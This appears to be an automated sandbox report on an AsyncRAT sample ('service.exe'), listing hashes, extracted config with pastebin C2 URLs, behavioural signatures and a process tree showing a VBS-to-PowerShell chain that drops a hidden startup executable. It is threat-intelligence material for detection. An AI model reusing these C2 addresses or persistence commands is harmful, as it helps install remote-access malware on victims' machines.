Analysis
max time kernel: 232s
max time network: 239s
platform: windows10-2004_x64
resource: win10v2004-20230221-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230221-en, locale:en-us, os:windows10-2004-x64, system
submitted: 20/03/2023, 13:15
Static task: static1
General
Target: service.exe
Size: 237KB
MD5: 2941d6fca94a537479d4d2a12c8a0ed2
SHA1: 6c8d05a2aefec10e7257fcbb2da8dfa822aacc1c
SHA256: 087427c0b74d495483859b7e587ef1063529253a2490c892d09f04465ef4f2c0
SHA512: e04fc8b6ea6a36cd67a841dda96ddefbab77a0fb994f0eb771ff357df40355ca7fad3afa75254dcd8eae0753cc0a478180e6343ba1ca55c7edf82dbbb3851826
SSDEEP: 3072:r4tWK9YMDbz6fV/NpbnyAGJwhOnQdT1MgvAOdj8MXoiTYfSHw69pJZXAqacHy1lg:m9j76xnImFZ1MmF8QTU/urSiLfTP8yl
Malware Config
Extracted: https://pastebin.com/raw/vNcCt60A
Extracted: asyncrat 0.5.7B
Default
Mutex:
delay: 3
install: false
install_folder: %AppData%
pastebin_config: https://pastebin.com/raw/3Z9zi18j
Signatures
- Async RAT payload (3 IoCs)
  resource | yara_rule
  behavioral1/files/0x0006000000023189-203.dat | asyncrat
  behavioral1/files/0x0006000000023189-204.dat | asyncrat
  behavioral1/memory/4640-205-0x0000000000AE0000-0x0000000000AF2000-memory.dmp | asyncrat
- Blocklisted process makes network request (4 IoCs)
  flow | pid | Process
  45 | 3392 | powershell.exe
  50 | 3392 | powershell.exe
  52 | 3392 | powershell.exe
  54 | 3392 | powershell.exe
- Downloads MZ/PE file
- Sets file to hidden (1 TTPs, 1 IoCs)
  Modifies file attributes to stop it showing in Explorer etc.
  pid | Process
  4084 | attrib.exe
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | service.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | WScript.exe
- Drops startup file (2 IoCs)
  description | ioc | Process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp4DD2.exe | powershell.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp4DD2.exe | attrib.exe
- Executes dropped EXE (1 IoCs)
  pid | Process
  4640 | tmp4DD2.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
- Drops file in Program Files directory (2 IoCs)
  description | ioc | Process
  File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\988a02bb-3051-49c1-8f67-934d9036fd2c.tmp | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230320141740.pma | setup.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
- Modifies registry class (2 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings | service.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe
- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  pid | Process
  3048 | powershell.exe
  3048 | powershell.exe
  3392 | powershell.exe
  3392 | powershell.exe
  1804 | msedge.exe
  1804 | msedge.exe
  2836 | msedge.exe
  2836 | msedge.exe
  3764 | identity_helper.exe
  3764 | identity_helper.exe
  4324 | msedge.exe
  4324 | msedge.exe
  4324 | msedge.exe
  4324 | msedge.exe
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (10 IoCs)
  pid | Process
  2836 | msedge.exe
  2836 | msedge.exe
  2836 | msedge.exe
  2836 | msedge.exe
  2836 | msedge.exe
  2836 | msedge.exe
  2836 | msedge.exe
  2836 | msedge.exe
  2836 | msedge.exe
  2836 | msedge.exe
- Suspicious use of AdjustPrivilegeToken (25 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 3048 | powershell.exe
  Token: SeDebugPrivilege | 3392 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 3392 | powershell.exe
  Token: SeSecurityPrivilege | 3392 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 3392 | powershell.exe
  Token: SeLoadDriverPrivilege | 3392 | powershell.exe
  Token: SeSystemProfilePrivilege | 3392 | powershell.exe
  Token: SeSystemtimePrivilege | 3392 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 3392 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 3392 | powershell.exe
  Token: SeCreatePagefilePrivilege | 3392 | powershell.exe
  Token: SeBackupPrivilege | 3392 | powershell.exe
  Token: SeRestorePrivilege | 3392 | powershell.exe
  Token: SeShutdownPrivilege | 3392 | powershell.exe
  Token: SeDebugPrivilege | 3392 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 3392 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 3392 | powershell.exe
  Token: SeUndockPrivilege | 3392 | powershell.exe
  Token: SeManageVolumePrivilege | 3392 | powershell.exe
  Token: 33 | 3392 | powershell.exe
  Token: 34 | 3392 | powershell.exe
  Token: 35 | 3392 | powershell.exe
  Token: 36 | 3392 | powershell.exe
  Token: SeDebugPrivilege | 4640 | tmp4DD2.exe
  Token: SeDebugPrivilege | 4640 | tmp4DD2.exe
- Suspicious use of FindShellTrayWindow (3 IoCs)
  pid | Process
  2836 | msedge.exe
  2836 | msedge.exe
  2836 | msedge.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  description | pid | Process | procid_target
  PID 4836 wrote to memory of 2308 | 4836 | service.exe | 86
  PID 4836 wrote to memory of 2308 | 4836 | service.exe | 86
  PID 4836 wrote to memory of 2308 | 4836 | service.exe | 86
  PID 2308 wrote to memory of 3048 | 2308 | WScript.exe | 87
  PID 2308 wrote to memory of 3048 | 2308 | WScript.exe | 87
  PID 2308 wrote to memory of 3048 | 2308 | WScript.exe | 87
  PID 3048 wrote to memory of 3392 | 3048 | powershell.exe | 91
  PID 3048 wrote to memory of 3392 | 3048 | powershell.exe | 91
  PID 3048 wrote to memory of 3392 | 3048 | powershell.exe | 91
  PID 3392 wrote to memory of 4084 | 3392 | powershell.exe | 103
  PID 3392 wrote to memory of 4084 | 3392 | powershell.exe | 103
  PID 3392 wrote to memory of 4084 | 3392 | powershell.exe | 103
  PID 3392 wrote to memory of 4640 | 3392 | powershell.exe | 105
  PID 3392 wrote to memory of 4640 | 3392 | powershell.exe | 105
  PID 3392 wrote to memory of 4640 | 3392 | powershell.exe | 105
  PID 4640 wrote to memory of 2836 | 4640 | tmp4DD2.exe | 112
  PID 4640 wrote to memory of 2836 | 4640 | tmp4DD2.exe | 112
  PID 2836 wrote to memory of 3808 | 2836 | msedge.exe | 113
  PID 2836 wrote to memory of 3808 | 2836 | msedge.exe | 113
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 5040 | 2836 | msedge.exe | 114
  PID 2836 wrote to memory of 1804 | 2836 | msedge.exe | 115
  PID 2836 wrote to memory of 1804 | 2836 | msedge.exe | 115
  PID 2836 wrote to memory of 2752 | 2836 | msedge.exe | 117
  PID 2836 wrote to memory of 2752 | 2836 | msedge.exe | 117
  PID 2836 wrote to memory of 2752 | 2836 | msedge.exe | 117
- Views/modifies file attributes (1 TTPs, 1 IoCs)
  pid | Process
  4084 | attrib.exe
Processes
Process tree; [n] is the depth of the entry in the tree, followed by the image path, the command line, triggered signatures and the PID.

[1] C:\Users\Admin\AppData\Local\Temp\service.exe
    "C:\Users\Admin\AppData\Local\Temp\service.exe"
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID: 4836
  [2] C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\config.vbs"
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
      PID: 2308
    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Unrestricted -nologo -command .\service.ps1
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 3048
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand 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
          - Blocklisted process makes network request
          - Drops startup file
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          PID: 3392
        [5] C:\Windows\SysWOW64\attrib.exe
            "C:\Windows\System32\attrib.exe" +s +h .\\tmp4DD2.exe
            - Sets file to hidden
            - Drops startup file
            - Views/modifies file attributes
            PID: 4084
        [5] C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp4DD2.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp4DD2.exe"
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            PID: 4640
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/
              - Enumerates system info in registry
              - Modifies registry class
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              - Suspicious use of FindShellTrayWindow
              - Suspicious use of WriteProcessMemory
              PID: 2836
            [7] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9a80946f8,0x7ff9a8094708,0x7ff9a8094718
                PID: 3808
            [7] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
                PID: 5040
            [7] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
                - Suspicious behavior: EnumeratesProcesses
                PID: 1804
            [7] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
                PID: 2752
            [7] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
                PID: 4452
            [7] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
                PID: 2044
            [7] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
                PID: 4260
            [7] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
                PID: 5064
            [7] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
                PID: 472
            [7] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5920 /prefetch:8
                PID: 3728
            [7] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                - Drops file in Program Files directory
                PID: 4664
              [8] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff73cfa5460,0x7ff73cfa5470,0x7ff73cfa5480
                  PID: 2140
            [7] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5920 /prefetch:8
                - Suspicious behavior: EnumeratesProcesses
                PID: 3764
            [7] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
                PID: 4112
            [7] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
                PID: 1616
            [7] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1784 /prefetch:1
                PID: 5424
            [7] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1696 /prefetch:1
                PID: 5396
            [7] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1
                PID: 8
            [7] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,6284149888498331097,3055336287059829696,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4292 /prefetch:2
                - Suspicious behavior: EnumeratesProcesses
                PID: 4324
[1] C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    PID: 1092
Network
MITRE ATT&CK Enterprise v6
Downloads

Filesize: 2KB
MD5: 957d822ad80c424427827c78b3ca4af9
SHA1: 1efa45c8436aa900c37b0acb6ea608951d4574b8
SHA256: 48290dffeb4e47abd9d68d92efaf47d9c9874c1eff8e878194e1505308196d9a
SHA512: 1837f846850932e36b7ca8c9b5baf07dd8b481b23c584cbe7526d2266028f65745f5fda9d7e3811e7a0077d5f78d98e440bc445cd1abbff75a36c97c1256d319

Filesize: 152B
MD5: 5a10efe23009825eadc90c37a38d9401
SHA1: fd98f2ca011408d4b43ed4dfd5b6906fbc7b87c0
SHA256: 05e135dee0260b4f601a0486401b64ff8653875d74bf259c2da232550dbfb4f5
SHA512: 89416a3f5bf50cd4a432ac72cd0a7fb79d5aeb10bdcc468c55bbfa79b9f43fab17141305d44cb1fe980ec76cc6575c27e2bcfcbad5ccd886d45b9de03fb9d6d7

Filesize: 152B
MD5: c1a3c45dc07f766430f7feaa3000fb18
SHA1: 698a0485bcf0ab2a9283d4ebd31ade980b0661d1
SHA256: adaba08026551b1b8f6c120143686da79f916d02adbef4a8d1c184e32a19fd48
SHA512: 9fc93f01ab4b14f555791d757ffe881787cc697102547c61847552e597e206e70c6d35fedff559c72a0a67d1b95e769095ecb0a8a7d4f07cf58a7a0d57d3e9f4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize: 288B
MD5: 22bda16fec93154b7875a02390dc38b7
SHA1: 0b6a584bd9347f865f3afaeef31e5e93f6b71f95
SHA256: 7554347737fbaf6247a02733ddd5f6daf1ed5ccb290495d8e1be7741d7157a4b
SHA512: bfc0e9e89ce19f41033c0b5aff5d82a6137a1845805eb1a9560ca07cc2f4bce48cad7e5f6c9feeea985c03c6e36d5c2f53cc6a7c3b3ca173b4d9c9cba04723f8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe58535b.TMP
Filesize: 48B
MD5: 07e6613137a19fec872544f5dc690cb9
SHA1: bd9e31d574941511af2831533bc7244269b5bcc0
SHA256: 56d136e1f1e4f783d4de0c9944cee6d1d94625c1d8953fed920ced8716e00bd9
SHA512: f4b9738e23ee2a7a33c0a2dd6f19d1d2b54dde7b3d85ea5762ad369be54f4ab3ec9d4ce33effbc8de06dfcd322b206641f75bf248497dda9762681d6c0ce5b88

Filesize: 70KB
MD5: e5e3377341056643b0494b6842c0b544
SHA1: d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256: e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA512: 83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Filesize: 2KB
MD5: 2fe2c400942edf202bbd10a687bc0aa2
SHA1: bee8ac90aaad3e525a711fcf1b5dd5fd64f864e8
SHA256: ef6ace55d165ea1799e99f9a4e1ca8d32fd073334bbacb98607a7cf0af36e93c
SHA512: 78739baf9fb06786f3d0b52914e09046c1e6cb430d79e3a8381392bcae6e064209095e0908130937c98abb74183d9845afc7935f14bff405c7cbe802396fa677

Filesize: 1KB
MD5: 337b8a83f1e01abc60986d7fe8ef7a35
SHA1: ed68860b938323d4b313ff4c4bb336d605787c5d
SHA256: 67dad85baa707a6171ab0f4f4c136e689da7adcc4130bd194745fd897afbbc52
SHA512: 0bd91ee478bf71c07a11db59e455e677108622bb53ea458fa73c27d0d4b97fffecdb4a132f59935881471a13f6de6d44404d6504449bbd67378889b443484546

Filesize: 111B
MD5: 285252a2f6327d41eab203dc2f402c67
SHA1: acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256: 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512: 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Filesize: 4KB
MD5: 994f89a45c81f6ead6c220547914da84
SHA1: 694f296ae5ea5903c43e3cbd299fd73272fdbf66
SHA256: 2834e2e15439806b7c2da742b51632cd4367ffd6dd1a3e62e95c3f17283e6745
SHA512: ed7153fb8774146e3f2f333e1ee2a7526f4fdd5c2fcaf6671481e87461b7223ef8aa11d334a1cff0faae4e59de27978b98ec04b07e2c1d26ef3c0f694aa0a01f

Filesize: 5KB
MD5: 4298816a7867796302cff14ee88a4c5c
SHA1: 955822ca0225bc07c5d8dd96404971feb73d7c14
SHA256: 22b139a5cda6b29e2278e3656666567b354b9fd6235914c26a99fab99c28e37a
SHA512: 804251224b6cc6f368b11526f8b693e087d9829b00000468da8a0f5fab5d2613a62c9bac8dbc6a897157c9988d532aff1d6050fc845c1fce6b1fe0d81588e498

Filesize: 5KB
MD5: 5a1182505346df56d48f0b91dcd75907
SHA1: 95eba14a108d316a9ee05cd1f90dc514dd0eeb44
SHA256: 301d8db311a1be732255c805f9fdcee88ae57b0cbe4372c7cbd2a5d20fa62e84
SHA512: 27fee5cf33a82c6c50e8434305ca0b544558750be24bdd4a6e7815f308455ef369fbe8087e213ac43bbd2b33166007637e090a6c722940486d4e3bebbd4c4e86

Filesize: 5KB
MD5: 3438374628ced6d9fc6dcad7e1b92372
SHA1: 3e088c335d5608d6f3399db80ad338545250868c
SHA256: 8be5dcbbfcb64db161241645736623e53d0d904d18885d0d34b4df9eb6aa23e1
SHA512: 5c72653bd0c4a8e59d4d4ed4fdf5e3e70f36399bc5866c069dfa52561b51d85576a511dd3803f7018232edfe139cc02a893b928632d35c3d5c7320eb4822d05f

Filesize: 24KB
MD5: 5edab6d3ffbeee247ccb4423f929a323
SHA1: a4ad201d149d59392a2a3163bd86ee900e20f3d9
SHA256: 460cddb95ea1d9bc8d95d295dd051b49a1436437a91ddec5f131235b2d516933
SHA512: 263fa99f03ea1ef381ca19f10fbe0362c1f9c129502dc6b730b076cafcf34b40a70ee8a0ee9446ec9c89c3a2d9855450609ec0f8cf9d0a1b2aebdd12be58d38c

Filesize: 16B
MD5: 206702161f94c5cd39fadd03f4014d98
SHA1: bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256: 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512: 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Filesize: 41B
MD5: 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1: d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256: f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
